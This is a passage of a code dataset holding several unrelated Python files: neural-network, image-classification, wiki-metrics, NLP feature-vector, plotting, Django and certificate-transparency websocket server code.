iterator\n for i, pre_u in enumerate(self.pre.units):\n for j, post_u in enumerate(self.post.units):\n W[i, j] = next(link_it).wt\n return W\n\n def learn(self):\n self.spec.learn(self)\n\n def cycle(self):\n self.spec.cycle(self)\n\n\n\nclass ConnectionSpec:\n\n legal_proj = 'full', '1to1' # ... for self.proj\n\n def __init__(self, **kwargs):\n \"\"\"Connnection parameters\"\"\"\n self.st = 1.0 # connection strength\n # self.force = False # activity are set directly in the post_layer\n self.inhib = False # if True, inhibitory connection\n self.proj = 'full' # connection pattern between units.\n # Can be 'Full' or '1to1'. In the latter case,\n # the layers must have the same size.\n self.lrule = None # the learning rule to use (None or 'leabra')\n\n # random initialization\n self.rnd_type = 'uniform' # shape of the weight initialization\n self.rnd_mean = 0.5 # mean of the random variable for weights init.\n self.rnd_var = 0.25 # variance (or ±range for uniform)\n\n self.lrate = 0.01 # learning rate\n\n self.m_lrn = 1.0 # weighting of the error driven learning\n\n self.d_thr = 0.0001\n self.d_rev = 0.1\n\n self.sig_off = 1.0\n self.sig_gain = 6.0\n\n for key, value in kwargs.items():\n assert hasattr(self, key) # making sure the parameter exists.\n setattr(self, key, value)\n\n def cycle(self, connection):\n \"\"\"Transmit activity.\"\"\"\n for link in connection.links:\n if not link.post.forced:\n scaled_act = self.st * link.wt * link.pre.act\n link.post.add_excitatory(scaled_act)\n\n def _rnd_wt(self):\n \"\"\"Return a random weight, according to the specified distribution\"\"\"\n if self.rnd_type == 'uniform':\n return random.uniform(self.rnd_mean - self.rnd_var,\n self.rnd_mean + self.rnd_var)\n raise NotImplementedError\n\n def _full_projection(self, connection):\n # creating unit-to-unit links\n connection.links = []\n for pre_u in connection.pre.units:\n for post_u in connection.post.units:\n w0 = self._rnd_wt()\n fw0 = self.sig_inv(w0)\n connection.links.append(Link(pre_u, post_u, w0, fw0))\n\n\n def _1to1_projection(self, connection):\n # creating unit-to-unit links\n connection.links = []\n assert connection.pre.size == connection.post.size\n for pre_u, post_u in zip(connection.pre.units, connection.post.units):\n w0 = self._rnd_wt()\n fw0 = self.sig_inv(w0)\n connection.links.append(Link(pre_u, post_u, w0, fw0))\n\n\n def projection_init(self, connection):\n if self.proj == 'full':\n self._full_projection(connection)\n if self.proj == '1to1':\n self._1to1_projection(connection)\n\n\n def learn(self, 
connection):\n if self.lrule is not None: # check the configured rule; 'self.learn' is the method itself and is always truthy\n self.learning_rule(connection)\n self.apply_dwt(connection)\n for link in connection.links:\n link.wt = max(0.0, min(1.0, link.wt)) # clipping weights after change\n\n def apply_dwt(self,connection):\n\n for link in connection.links:\n link.dwt *= (1 - link.fwt) if (link.dwt > 0) else link.fwt\n link.fwt += link.dwt\n link.wt = self.sig(link.fwt)\n\n link.dwt = 0.0\n\n def learning_rule(self, connection):\n \"\"\"Leabra learning rule.\"\"\"\n\n for link in connection.links:\n srs = link.post.avg_s_eff * link.pre.avg_s_eff\n srm = link.post.avg_m * link.pre.avg_m\n link.dwt += ( self.lrate * ( self.m_lrn * self.xcal(srs, srm)\n + link.post.avg_l_lrn * self.xcal(srs, link.post.avg_l)))\n\n def xcal(self, x, th):\n if (x < self.d_thr):\n return 0\n elif (x > th * self.d_rev):\n return (x - th)\n else:\n return (-x * ((1 - self.d_rev)/self.d_rev))\n\n def sig(self, w):\n return 1 / (1 + (self.sig_off * (1 - w) / w) ** self.sig_gain)\n\n def sig_inv(self, w):\n return 1 / (1 + ((1 - w) / w) ** (1 / self.sig_gain) / self.sig_off)\n","sub_path":"leabra/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"208430277","text":"# Import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport PIL\nimport random\n\nfrom sklearn.utils import shuffle\nfrom skimage.util import random_noise\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_auc_score\n\nimport tensorflow as tf\nimport tensorflow.keras\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nfrom tensorflow.keras.applications.vgg16 import preprocess_input, decode_predictions, VGG16\nfrom tensorflow.keras.applications import ResNet50\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPool2D , Flatten, Dropout, BatchNormalization\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras import models\nfrom tensorflow.keras.optimizers import SGD,Adam\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau, ModelCheckpoint, EarlyStopping\n\n# Load Data\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()\n\n#Show random example in category\ndef display_category_examples(pred_val=None):\n \"\"\"If no input, display one example for all category predictions. If input is list, displays one example for listed categories. 
If input\n is integer, display one example for the specified category.\"\"\"\n if pred_val==None:\n ys=np.unique(y_train)\n elif type(pred_val)==list:\n ys=pred_val\n elif type(pred_val)==int:\n ys=[pred_val]\n else:\n raise ValueError(\"Invalid Input\") # raising a bare string is invalid in Python 3\n \n for possible_y in ys:\n img_idx=random.choice(np.where(y_train==possible_y)[0])\n plt.imshow(PIL.Image.fromarray(x_train[img_idx]))\n plt.title(str(possible_y))\n plt.show()\n \n#Better Method\ndef display_category_examples_2():\n class_types = ['airplane', 'automobile', 'bird', 'cat', 'deer',\n 'dog', 'frog', 'horse', 'ship', 'truck'] # from cifar-10 website\n \n plt.figure(figsize=(10,10))\n for i in range(12):\n plt.subplot(4,3,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(x_train[i], cmap='gray')\n plt.xlabel(class_types[y_train[i][0]], fontsize=13)\n plt.tight_layout() \n plt.show()\n#%% Restrict categories [i.e. cats vs dogs]\n# =============================================================================\n# train_idx=np.append(np.where(y_train==3)[0], np.where(y_train==5)[0])\n# test_idx=np.append(np.where(y_test==3)[0], np.where(y_test==5)[0])\n# \n# x_train, y_train=(x_train[train_idx], y_train[train_idx])\n# x_test, y_test=(x_test[test_idx], y_test[test_idx])\n# \n# #Convert y values: 3 (Cats) and 5 (Dogs) to 0 and 1\n# y_train=np.array([0 if i==3 else 1 for i in y_train])\n# y_test=np.array([0 if i==3 else 1 for i in y_test])\n# =============================================================================\n\n#%% Pre-processing model inputs\n#Normalize Image Arrays to [0-1]\n# =============================================================================\n# x_train, x_test = x_train/255.0, x_test/255.0\n# =============================================================================\n \nx_train=tensorflow.keras.applications.resnet.preprocess_input(x_train)\nx_test=tensorflow.keras.applications.resnet.preprocess_input(x_test)\n\n#Reshape arrays\ny_train=y_train.flatten().reshape((y_train.shape[0],1))\ny_test=y_test.flatten().reshape((y_test.shape[0],1))\n\n#Shuffle arrays\n# =============================================================================\n# x_train,y_train=shuffle(x_train,y_train)\n# x_test,y_test=shuffle(x_test,y_test)\n# x_train, x_val, y_train, y_val=train_test_split(x_train, y_train, train_size=0.7, test_size=0.3)\n# =============================================================================\n#%% MODEL\n# =============================================================================\n# base_model_vgg16 = VGG16(include_top = False, weights='imagenet', input_shape = (32,32,3), classes = 2)\n# base_model_vgg16.trainable = False\n# =============================================================================\nbase_model_resnet50=ResNet50(include_top = False, weights='imagenet', input_shape = (224,224,3), classes = 10)\nbase_model_resnet50.trainable=False\n\n# =============================================================================\n# for layer in base_model_resnet50.layers[:]:\n# layer.trainable=False\n# =============================================================================\n\n# =============================================================================\n# model.add(Conv2D(16, kernel_size=(5, 5), \n# strides=(1, 1),\n# activation='relu',\n# kernel_initializer=\"normal\",\n# input_shape=(32,32,3),\n# name=\"conv_1\"\n# ))\n# model.add(MaxPool2D(pool_size=(2, 2), \n# strides=(1, 1)))\n# model.add(Dropout(0.2))\n# model.add(Conv2D(8, (3, 3), \n# activation='relu', \n# 
kernel_initializer=\"normal\",\n# name=\"conv_2\"))\n# model.add(MaxPool2D(pool_size=(2, 2),\n# name=\"maxpool_1\"))\n# model.add(Dropout(0.2))\n# model.add(Flatten(name=\"flatten\"))\n# model.add(Dense(4, \n# kernel_initializer=\"normal\",\n# activation=\"relu\"))\n# =============================================================================\n# =============================================================================\n# model.add(base_model_resnet50)\n# model.add(Dense(512,\n# activation=\"relu\"))\n# model.add(Dense(32,\n# activation=\"relu\"))\n# model.add(Dense(10,\n# activation=\"softmax\"))\n# model.summary()\n# \n# =============================================================================\n\ninputs=tf.keras.Input(shape=(32,32,3)) # renamed from 'input' to avoid shadowing the builtin\nreshaped_input=tf.keras.layers.Lambda(lambda x: tf.image.resize_with_pad(x, 224, 224))(inputs)\nbase_model=base_model_resnet50(reshaped_input)\nflatten=Flatten()(base_model)\noutput=Dense(10, activation=\"softmax\")(flatten)\n\nmodel=tf.keras.Model(inputs, output)\n#%%Hyper-parameters\nn_batch_size=10\nnum_epoch=50\nlearn_rate=5e-5\n\n#%%Compiling model\nsgd=SGD(lr=learn_rate,momentum=.9,nesterov=False)\nmodel.compile(optimizer = sgd, loss = tf.keras.losses.SparseCategoricalCrossentropy(), metrics = ['accuracy'])\n\n# =============================================================================\n# callbacks = [\n# EarlyStopping(patience=20, verbose=1),\n# ReduceLROnPlateau(factor=0.01, patience=10, min_lr=1e-7, verbose=1)]\n# =============================================================================\n\nhistory = model.fit(x_train, y_train, \n batch_size=n_batch_size,\n epochs=num_epoch,\n validation_split=0.3, # x_val/y_val from the commented-out train_test_split are undefined\n verbose=1, \n shuffle=True)\n\n\n#%%\n# =============================================================================\n# datagen = ImageDataGenerator(\n# featurewise_center=True,\n# featurewise_std_normalization=True,\n# rotation_range=20,\n# width_shift_range=0.2,\n# height_shift_range=0.2,\n# horizontal_flip=True)\n# datagen.fit(x_train)\n# history = model.fit(datagen.flow(x_train, y_train, batch_size=n_batch_size), epochs=num_epoch)\n# =============================================================================\n#%% Evaluate on Test\ny_pred=np.argmax(model.predict(x_test), axis=1)\ncm=confusion_matrix(y_test, y_pred)\n\n# Sensitivity, Specificity, Precision: these binary metrics only apply to the\n# 2-class (cats vs dogs) setup above; cm.ravel() has 100 entries for 10 classes\nif cm.shape == (2, 2):\n true_negative, false_positive, false_negative, true_positive = cm.ravel()\n precision = true_positive / (true_positive + false_positive)\n recall = true_positive / (true_positive + false_negative)\n specificity = true_negative / (true_negative + false_positive)\n\n print('Precision:{:.2f}'.format(precision))\n print('Sensitivity:{:.2f}'.format(recall))\n print('Specificity:{:.2f}'.format(specificity))\n\n#AUC\n# =============================================================================\n# auc = roc_auc_score(y_test, y_pred)\n# print(auc)\n# =============================================================================\n","sub_path":"scripts/model_cifar10.py","file_name":"model_cifar10.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"601260462","text":"from sqlalchemy import func\nfrom metric import Metric\nfrom form_fields import CommaSeparatedIntegerListField\nfrom wtforms.validators import Required\nfrom wikimetrics.models import Page, Revision\nimport logging\nlogger = logging.getLogger(__name__)\n\n__all__ = [\n 'NamespaceEdits',\n]\n\n\nclass NamespaceEdits(Metric):\n 
\"\"\"\n This class implements namespace edits logic.\n An instance of the class is callable and will compute the number of edits\n for each user in a passed-in list.\n \n This sql query was used as a starting point for the sqlalchemy query:\n \n select r.rev_user, r.count(*)\n from revision r\n inner join\n page p on p.page_id = r.rev_page\n where r.rev_timestamp between [start] and [end]\n and r.rev_user in ([parameterized])\n and p.page_namespace in ([parameterized])\n group by rev_user\n \"\"\"\n \n show_in_ui = True\n id = 'edits'\n label = 'Edits'\n description = 'Compute the number of edits in a specific namespace of a mediawiki project'\n \n namespaces = CommaSeparatedIntegerListField(\n None,\n [Required()],\n default='0',\n description='0, 2, 4, etc.',\n )\n \n def __call__(self, user_ids, session):\n \"\"\"\n Parameters:\n user_ids : list of mediawiki user ids to find edit for\n session : sqlalchemy session open on a mediawiki database\n \n Returns:\n dictionary from user ids to the number of edit found.\n \"\"\"\n # directly construct dict from query results\n logger.debug('user_ids: %s, namespaces: %s', user_ids, self.namespaces)\n revisions_by_user = dict(\n session\n .query(Revision.rev_user, func.count(Revision.rev_id))\n .join(Page)\n .filter(Page.page_namespace.in_(self.namespaces.data))\n .filter(Revision.rev_user.in_(user_ids))\n .group_by(Revision.rev_user)\n .all()\n )\n return {user_id: revisions_by_user.get(user_id, 0) for user_id in user_ids}\n","sub_path":"wikimetrics/metrics/namespace_edits.py","file_name":"namespace_edits.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"310611783","text":"import json\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nimport csv\nimport nltk.sentiment.sentiment_analyzer\nfrom nltk.corpus import stopwords\nfrom string import punctuation\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tag import pos_tag\nfrom itertools import chain\nimport re\nfrom numpy import *\nimport nltk.sentiment.sentiment_analyzer\n\ndef lemmatize_sentence(tokens):\n lemmatizer = WordNetLemmatizer()\n lemmatized_sentence = []\n for word, tag in pos_tag(tokens):\n if tag.startswith('NN'):\n pos = 'n'\n elif tag.startswith('VB'):\n pos = 'v'\n else:\n pos = 'a'\n lemmatized_sentence.append(lemmatizer.lemmatize(word, pos))\n return lemmatized_sentence\n\n#Function finds all synonyms from features. Returns dict with synonyms.\ndef syn():\n with open('Features_popular.txt', 'r', encoding = \"utf_8_sig\") as Features_popular:\n features_text = json.load(Features_popular)\n\n\n synonyms = {}\n lemmas = []\n for word in features_text:\n lemmas.clear()\n for syn in wn.synsets(word):\n for l in syn.lemmas():\n lemmas.append(l.name())\n synonyms.update({word: lemmas.copy()})\n return synonyms\n\n# def syno():\n# synonyms = []\n#\n# for syn in wn.synsets(\"chemical\"):\n# for l in syn.lemmas():\n# synonyms.append(l.name())\n# print(set(synonyms))\n#\n# for i, j in enumerate(wn.synsets('chemical')):\n# print(\"Hypernyms:\", \", \".join(list(chain(*[l.lemma_names() for l in j.hypernyms()]))))\n# print(\"Hyponyms:\", \", \".join(list(chain(*[l.lemma_names() for l in j.hyponyms()]))))\n# syno()\n#Function finds all hyponyms from features. 
Returns dict with hyponyms.\ndef hypo():\n with open('Features_popular.txt', 'r',encoding = \"utf_8_sig\") as Features_popular:\n features_text = json.load(Features_popular)\n\n Hyponyms = {}\n hyp = []\n for word in features_text:\n hyp.clear()\n for i, j in enumerate(wn.synsets(word)):\n if i < 1:\n x = list(chain(*[l.lemma_names() for l in j.hyponyms()]))\n hyp.append(x)\n Hyponyms.update({word: hyp.copy()})\n return Hyponyms\n\n#Function finds all hypernyms from features. Returns dict with hypernyms.\ndef hype():\n with open('Features_popular.txt', 'r', encoding = \"utf_8_sig\") as Features_popular:\n features_text = json.load(Features_popular)\n\n Hypernyms = {}\n hype = []\n for word in features_text:\n hype.clear()\n for i, j in enumerate(wn.synsets(word)):\n if i < 2:\n x = list(chain(*[l.lemma_names() for l in j.hypernyms()]))\n hype.append(x)\n Hypernyms.update({word: hype.copy()})\n return Hypernyms\n\n\ndef semantic_score(word1, word2):\n try:\n w1 = wn.synset(\"%s.n.01\" % (word1))\n w2 = wn.synset(\"%s.n.01\" % (word2))\n return wn.wup_similarity(w1, w2, simulate_root=False)\n except:\n return 0\n\n#Function tags words that occur in a negative context\ndef NegativeWord():\n with open('trunc.json', 'r', encoding = \"utf_8_sig\") as f:\n jsonData = json.load(f)\n\n tag_negative_words = list(copy(jsonData))\n for i in tag_negative_words:\n text = i[\"reviewText\"].split()\n analysis = nltk.sentiment.util.mark_negation(text)\n customStopWords = set(stopwords.words('english') + list(punctuation))\n WordsStopResult = [word for word in analysis if word not in customStopWords]\n lemmitazer_output = lemmatize_sentence(WordsStopResult)\n i.update({\"reviewText\": lemmitazer_output})\n del (i[\"label\"])\n\n # print(tag_negative_words)\n with open(\"Tag_nagative.txt\", \"w\", encoding = \"utf_8_sig\") as tag_negative:\n json.dump(tag_negative_words, tag_negative, indent=4)\n\n return tag_negative_words\n\n#Function transfers features into vector space. 
The output is a vector of 0, 1 and -1 values.\ndef get_full_vector():\n with open('trunc.json', 'r', encoding = \"utf_8_sig\") as f:\n jsonData = json.load(f)\n\n corpus = []\n for i in jsonData:\n corpus.append(i[\"reviewText\"])\n print(corpus)\n\n # corpus_new = map(lambda x: x.lower(), corpus)\n # print(corpus_new)\n for i in range(len(corpus)):\n corpus[i] = corpus[i].lower()\n corpus[i] = re.sub(r'\\W', ' ', corpus[i])\n corpus[i] = re.sub(r'\\s+', ' ', corpus[i])\n print(corpus)\n # print(len(corpus))\n\n with open('Features_popular.txt', 'r', encoding = \"utf_8_sig\") as Features_popular:\n features_text = json.load(Features_popular)\n print(features_text)\n\n synonym = syn()\n sentence_vectors = []\n tag_neg = NegativeWord()\n for i in tag_neg:\n sentence_tokens = i[\"reviewText\"]\n # sentence_tokens = nltk.word_tokenize(sentence)\n sent_vec = {}\n sent_vec.update({\"overall\": i[\"overall\"]})\n for token in features_text:\n flag = False\n if token in sentence_tokens:\n if token + '_NEG' in sentence_tokens:\n sent_vec.update({token: -1})\n flag = True\n else:\n sent_vec.update({token: 1})\n flag = True\n else:\n for syno in synonym[token]:\n if syno in sentence_tokens:\n count = semantic_score(syno, sentence_tokens[sentence_tokens.index(syno)])\n if (count >= 0.5):\n sent_vec.update({token: 1})\n flag = True\n break\n else:\n if syno + \"_NEG\" in sentence_tokens:\n count = semantic_score(syno, sentence_tokens[sentence_tokens.index(syno + \"_NEG\")][:-4])\n if (count >= 0.5):\n sent_vec.update({token: -1})\n flag = True\n break\n if not flag:\n sent_vec.update({token: 0})\n for k,v in sent_vec.items():\n if (k==\"overall\") and (v<5):\n sentence_vectors.append(sent_vec)\n # print(sentence_vectors)\n # sentence_vectors = np.asarray(sentence_vectors)\n\n print(sentence_vectors)\n\n with open(\"Data_vector_reviews.csv\", \"w\", newline=\"\") as file:\n columns = sentence_vectors[0].keys()\n writer = csv.DictWriter(file, fieldnames=columns)\n writer.writeheader()\n # write multiple rows\n writer.writerows(sentence_vectors)\n\n return sentence_vectors\nget_full_vector()","sub_path":"Get_vector_features.py","file_name":"Get_vector_features.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"257673192","text":"\"\"\"\nA set of convenience functions used for producing plots in `dabest`.\n\nAuthor: Joses W. 
Ho\nEmail: joseshowh@gmail.com\nLicense: MIT\n\"\"\"\n\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\nfrom .misc_tools import merge_two_dicts\n\n\ndef halfviolin(v, half = 'right', color = 'k'):\n for b in v['bodies']:\n mVertical = np.mean(b.get_paths()[0].vertices[:, 0])\n mHorizontal = np.mean(b.get_paths()[0].vertices[:, 1])\n vertices = b.get_paths()[0].vertices\n if half == 'left':\n b.get_paths()[0].vertices[:, 0] = np.clip(vertices[:, 0],\n -np.inf, mVertical)\n if half == 'right':\n b.get_paths()[0].vertices[:, 0] = np.clip(vertices[:, 0],\n mVertical, np.inf)\n if half == 'bottom':\n b.get_paths()[0].vertices[:, 1] = np.clip(vertices[:, 1],\n -np.inf, mHorizontal)\n if half == 'top':\n b.get_paths()[0].vertices[:, 1] = np.clip(vertices[:, 1],\n mHorizontal, np.inf)\n b.set_color(color)\n\ndef align_yaxis(ax1, v1, ax2, v2):\n \"\"\"adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1\"\"\"\n # Taken from\n # http://stackoverflow.com/questions/7630778/\n # matplotlib-align-origin-of-right-axis-with-specific-left-axis-value\n _, y1 = ax1.transData.transform((0, v1))\n _, y2 = ax2.transData.transform((0, v2))\n inv = ax2.transData.inverted()\n _, dy = inv.transform((0, 0)) - inv.transform((0, y1-y2))\n miny, maxy = ax2.get_ylim()\n ax2.set_ylim(miny+dy, maxy+dy)\n\ndef rotate_ticks(axes, angle=45, alignment='right'):\n for tick in axes.get_xticklabels():\n tick.set_rotation(angle)\n tick.set_horizontalalignment(alignment)\n\ndef tufte_summary_line(df, x, y, type='mean_sd',\n offset=0.3, ax=None, **kwargs):\n '''Convenience function to plot summary statistics (mean and standard\n deviation, or median and 25th & 75th percentiles) for each group in the `x`\n column of `df`. This style is inspired by Edward Tufte.\n\n Keywords\n --------\n df: pandas DataFrame.\n This DataFrame should be in 'long' format.\n\n x, y: string.\n x and y columns to be plotted.\n\n type: {'mean_sd', 'median_quartiles'}, default 'mean_sd'\n Plots the summary statistics for each group. If 'mean_sd', then the\n mean and standard deviation of each group is plotted as a notched\n line beside each group. 
If 'median_quartiles', then the\n median and 25th and 75th percentiles of each group are plotted\n instead.\n\n offset: float, default 0.3\n The x-offset of the summary line.\n\n ax: matplotlib Axes, default None\n If specified, the axes to plot on.\n\n kwargs: dict, default None\n Dictionary with kwargs passed to `matplotlib.patches.FancyArrow`.\n See docs at\n https://matplotlib.org/api/_as_gen/\n matplotlib.patches.FancyArrow.html#matplotlib.patches.FancyArrow\n\n '''\n import matplotlib.patches as mpatches\n\n if ax is None:\n ax = plt.gca()\n\n means = df.groupby(x)[y].mean()\n sd = df.groupby(x)[y].std()\n lower_sd = means - sd\n upper_sd = means + sd\n\n medians = df.groupby(x)[y].median()\n quantiles = df.groupby(x)[y].quantile([0.25, 0.75]).unstack()\n lower_quartiles = quantiles[0.25]\n upper_quartiles = quantiles[0.75]\n\n if type == 'mean_sd':\n central_measures = means\n low = lower_sd\n high = upper_sd\n elif type == 'median_quartiles':\n central_measures = medians\n low = lower_quartiles\n high = upper_quartiles\n\n total_width = 0.05 # the horizontal span of the line, aka `linewidth`.\n\n for k, m in enumerate(central_measures):\n\n kwargs['dx'] = 0\n kwargs['width'] = total_width\n kwargs['head_width'] = total_width\n kwargs['length_includes_head'] = True\n\n if type == 'mean_sd':\n dy_low = dy_high = sd[k]\n elif type == 'median_quartiles':\n dy_low = m - low[k]\n dy_high = high[k] - m\n\n arrow = mpatches.FancyArrow(x=offset+k, y=low[k],\n dy=dy_low,\n head_length=0.3*dy_low,\n **kwargs)\n ax.add_patch(arrow)\n\n arrow = mpatches.FancyArrow(x=offset+k, y=high[k],\n dy=-dy_high,\n head_length=0.3*dy_high,\n **kwargs)\n ax.add_patch(arrow)\n\ndef get_swarm_spans(coll):\n \"\"\"\n Given a matplotlib Collection, will obtain the x and y spans\n for the collection. Will return None if this fails.\n \"\"\"\n import numpy as np\n x, y = np.array(coll.get_offsets()).T\n try:\n return x.min(), x.max(), y.min(), y.max()\n except ValueError:\n return None\n\ndef gapped_lines(data, x, y,\n type='mean_sd',\n offset=0.3,\n ax=None,\n **kwargs):\n '''\n Convenience function to plot the standard deviations as vertical\n errorbars. The mean is a gap defined by negative space.\n\n This style is inspired by Edward Tufte's redesign of the boxplot.\n See The Visual Display of Quantitative Information (1983), pp.128-130.\n\n Keywords\n --------\n data: pandas DataFrame.\n This DataFrame should be in 'long' format.\n\n x, y: string.\n x and y columns to be plotted.\n\n type: {'mean_sd', 'median_quartiles'}, default 'mean_sd'\n Plots the summary statistics for each group. If 'mean_sd', then the\n mean and standard deviation of each group is plotted as a gapped line.\n If 'median_quartiles', then the median and 25th and 75th percentiles of\n each group are plotted instead.\n\n offset: float, default 0.3\n The x-offset of the mean-sd line.\n\n ax: matplotlib Axes object, default None\n If a matplotlib Axes object is specified, the gapped lines will be\n plotted in order on this axes. 
If None, the current axes (plt.gca())\n is used.\n\n kwargs: dict, default None\n Dictionary with kwargs passed to matplotlib.lines.Line2D\n '''\n import matplotlib.lines as mlines\n\n if ax is None:\n ax = plt.gca()\n\n keys = kwargs.keys()\n if 'zorder' not in keys:\n kwargs['zorder'] = 5\n\n if 'lw' not in keys:\n kwargs['lw'] = 2.\n\n if 'color' not in keys:\n kwargs['color'] = 'black'\n\n means = data.groupby(x)[y].mean()\n sd = data.groupby(x)[y].std()\n pooled_sd = sd.mean()\n lower_sd = means - sd\n upper_sd = means + sd\n\n medians = data.groupby(x)[y].median()\n quantiles = data.groupby(x)[y].quantile([0.25, 0.75]).unstack()\n lower_quartiles = quantiles[0.25]\n upper_quartiles = quantiles[0.75]\n\n if type == 'mean_sd':\n central_measures = means\n lows = lower_sd\n highs = upper_sd\n elif type == 'median_quartiles':\n central_measures = medians\n lows = lower_quartiles\n highs = upper_quartiles\n\n original_zorder = kwargs['zorder']\n span_color = kwargs['color']\n span_lw = kwargs['lw']\n for xpos, cm in enumerate(central_measures):\n # add vertical span line.\n kwargs['zorder'] = original_zorder\n kwargs['color'] = span_color\n kwargs['lw'] = span_lw\n low_to_high = mlines.Line2D([xpos+offset, xpos+offset],\n [lows[xpos], highs[xpos]],\n **kwargs)\n ax.add_line(low_to_high)\n\n # add horizontal central measure line.\n kwargs['zorder'] = 6\n kwargs['color'] = 'white'\n kwargs['lw'] = 2\n mean_line = mlines.Line2D([xpos+offset-0.01,\n xpos+offset+0.01],\n [cm, cm],\n **kwargs)\n ax.add_line(mean_line)\n","sub_path":"dabest/plot_tools.py","file_name":"plot_tools.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"329765052","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,get_object_or_404,redirect\nfrom .models import Comment,Post\nfrom member.models import User\nfrom django.http import HttpResponse\nfrom .forms import Commentform\n\n\ndef post_list(request):\n \n posts = Post.objects.all()\n comments = Comment.objects.all()\n context = {\n 'comments' :comments,\n 'posts' : posts,\n }\n\n return render(request,\"post.html\",context)\n\ndef createcomment(request, post_pk):\n if request.method =='POST':\n post = get_object_or_404(Post, pk=post_pk)\n content = request.POST.get('content')\n comment_form = Commentform(request.POST)\n\n if comment_form.is_valid():\n comment = comment_form.save(commit =False)\n comment.post = post\n comment.author = request.user\n comment.save()\n #Redirect to the post_list view under the 'post' URL namespace.\n return redirect('post:post_list')\n\ndef post_detail(request,post_pk):\n post = get_object_or_404(Post,pk=post_pk)\n comment_form = Commentform()\n context={\n 'post' : post,\n 'comment' : comment_form,\n }\n return render(request,'post_detail.html',context)\n","sub_path":"post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"75823632","text":"import asyncio\nimport collections\nimport json\nimport logging\nimport os\nimport time\n\nfrom aiohttp import web\nfrom aiohttp.web_urldispatcher import Response\n\nfrom certstream.util import pretty_date, get_ip\n\nWebsocketClientInfo = collections.namedtuple(\n 'WebsocketClientInfo',\n ['external_ip', 'queue', 'connection_time', 'channel']\n)\n\nSTATIC_INDEX = '''\n\n\n \n \n \n \n \n \n 
\n \n\n'''.format(time.time())\n\nclass WebServer(object):\n def __init__(self, _loop, transparency_watcher):\n self.active_sockets = []\n self.valid_channels = [\n 'default',\n 'dns-only',\n 'leaf-only',\n ]\n self.recently_seen = collections.deque(maxlen=25)\n self.stats_url = os.getenv(\"STATS_URL\", 'stats')\n self.logger = logging.getLogger('certstream.webserver')\n\n self.loop = _loop\n self.watcher = transparency_watcher\n\n self.app = web.Application(loop=self.loop, middlewares=[self.redirect_ssl_if_needed,])\n\n self._add_routes()\n\n def run_server(self):\n self.mux_stream = asyncio.ensure_future(self.mux_ctl_stream())\n self.heartbeat_coro = asyncio.ensure_future(self.ws_heartbeats())\n web.run_app(\n self.app,\n port=int(os.environ.get('PORT', 8080)),\n loop=self.loop,\n )\n\n def _add_routes(self):\n self.app.router.add_get(\"/latest.json\", self.latest_json_handler)\n self.app.router.add_get(\"/example.json\", self.example_json_handler)\n self.app.router.add_get(\"/{}\".format(self.stats_url), self.stats_handler)\n self.app.router.add_get('/', self.root_handler)\n self.app.router.add_get('/develop', self.dev_handler)\n\n async def redirect_ssl_if_needed(self, _, handler):\n async def middleware_handler(request):\n if os.environ.get('NOSSL') == None and not request.host.startswith('127.0.0.1') and request.headers.get('X-Forwarded-Proto', 'http') == 'http':\n return web.HTTPFound(request.url.with_scheme('https'))\n response = await handler(request)\n return response\n return middleware_handler\n\n async def mux_ctl_stream(self):\n while True:\n cert_data = await self.watcher.stream.get()\n\n data_packet = {\n \"message_type\": \"certificate_update\",\n \"data\": cert_data\n }\n\n self.recently_seen.append(data_packet)\n\n for client in self.active_sockets:\n await client.queue.put(data_packet)\n\n async def dev_handler(self, request):\n # If we have a websocket request\n if request.headers.get(\"Upgrade\"):\n ws = web.WebSocketResponse()\n\n await ws.prepare(request)\n\n try:\n for message in self.recently_seen:\n message_json = json.dumps(message)\n await ws.send_str(message_json)\n except asyncio.CancelledError:\n print('websocket cancelled')\n\n await ws.close()\n\n return ws\n\n return web.Response(\n body=json.dumps(\n {\n \"error\": \"Please use this url with a websocket client!\"\n },\n indent=4\n ),\n content_type=\"application/json\",\n )\n\n async def root_handler(self, request, filename=None):\n # If we have a websocket request\n if request.headers.get(\"Upgrade\"):\n requested_channel = request.GET.get('channel', 'default')\n\n if requested_channel not in self.valid_channels:\n raise web.HTTPBadRequest(text=\"Invalid channel!\")\n\n ws = web.WebSocketResponse()\n\n await ws.prepare(request)\n\n client_queue = asyncio.Queue()\n\n websocket_info = WebsocketClientInfo(\n external_ip=get_ip(request),\n queue=client_queue,\n connection_time=int(time.time()),\n channel=requested_channel\n )\n\n self.active_sockets.append(websocket_info)\n\n try:\n while True:\n message = await client_queue.get()\n message_json = json.dumps(message)\n await ws.send_str(message_json)\n except asyncio.CancelledError:\n print('websocket cancelled')\n finally:\n self.active_sockets.remove(websocket_info)\n\n await ws.close()\n\n return ws\n else:\n return Response(body=STATIC_INDEX, content_type=\"text/html\")\n\n async def latest_json_handler(self, _):\n return web.Response(\n body=json.dumps(\n 